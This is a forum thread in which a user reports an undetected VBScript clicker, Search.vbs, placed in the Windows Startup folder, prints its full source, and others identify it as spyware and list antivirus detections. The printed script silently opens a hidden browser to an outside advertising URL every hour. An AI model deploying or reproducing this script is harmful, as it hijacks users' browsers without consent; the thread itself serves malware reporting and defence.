New virus - undetected

[facorreia]

There is a malware on the Web that avast doesn't detect yet.

Information:

- Periodically a browser window opens on the address http://vbs.searchwww.com/vbs.cgi

- The culprit is a file named Search.vbs that is installed in the All Users' start menu group (\Documents and Settings\All Users\Start Menu\Startup)

- The file contents is:
while 1
wscript.sleep 3600000
set search = createobject("internetexplorer.application")
search.height = 0
search.menubar = 0
search.statusbar = 0
search.toolbar = 0
search.width = 0
search.navigate "http://vbs.searchwww.com/vbs.cgi"
do while search.busy
wscript.sleep 1000
loop
if search.height = 0 and search.width = 0 then
search.quit
else
search.visible = 1
end if
wend

[DavidR]

Hi facorreia, welcome to the forums.

This appears to be a browser hijack, rather than a virus and as such won't be dected as a virus.  It is difficult to suggest a solution without information.

You don't mention what effects this has had, download ads, redirect to various adult related sites, etc. The more information you can provide the more likely we are to be able to help.

Also as from the url (vbs.search, etc.) it would appear to be a Visual Basic script? and if so is script blocking is not a feature of the free avast home version. If you require script blocking this is available in the Pro version.

Do you have any anti adware/spyware softhare installed (look at my sig below fr some), do you have the hijackthis program? if so have you run it? what were the results (paste them here or check out, Eddy's HiJackThis Info and Analysis page, HijackThis log file analyzer and follow the directions there and get back to us if you need more help....

[RejZoR]

Its not a virus. Its spyware.
I have run the URL over at my Virtual Machine and i got the GAIN/Precision Time Advertisement installer popup along with other normal popups.

[facorreia]

I stand corrected, it is not a virus.

But it is a malware, and I think any system security software should block all kind of malwares, despite their form of propagation.

Other tools already do:

Jotti's malware scan 2.41
 
AntiVir  TR/Click.Krepper (2.48 seconds taken)
Avast  No viruses found (7.78 seconds taken)
BitDefender  Trojan.Clicker.VBS.Krepper (5.72 seconds taken)
ClamAV  Trojan.Krepper.A (14.99 seconds taken)
Dr.Web  No viruses found (8.81 seconds taken)
F-Prot Antivirus  No viruses found (0.81 seconds taken)
F-Secure Anti-Virus  TrojanClicker.VBS.Krepper (8.73 seconds taken)
Kaspersky Anti-Virus  TrojanClicker.VBS.Krepper (8.63 seconds taken)
mks_vir  VBS.Krepper.A (7.92 seconds taken)
NOD32  No viruses found (6.20 seconds taken)
Norman Virus Control  No viruses found (2.87 seconds taken)

[raman]

If you allready have this one, than there is probably more malware! You should post a Hijackthis log, so someone here could take a look at it.
How to do it? www.hjt.klaffke.de/en

[facorreia]

Thanks!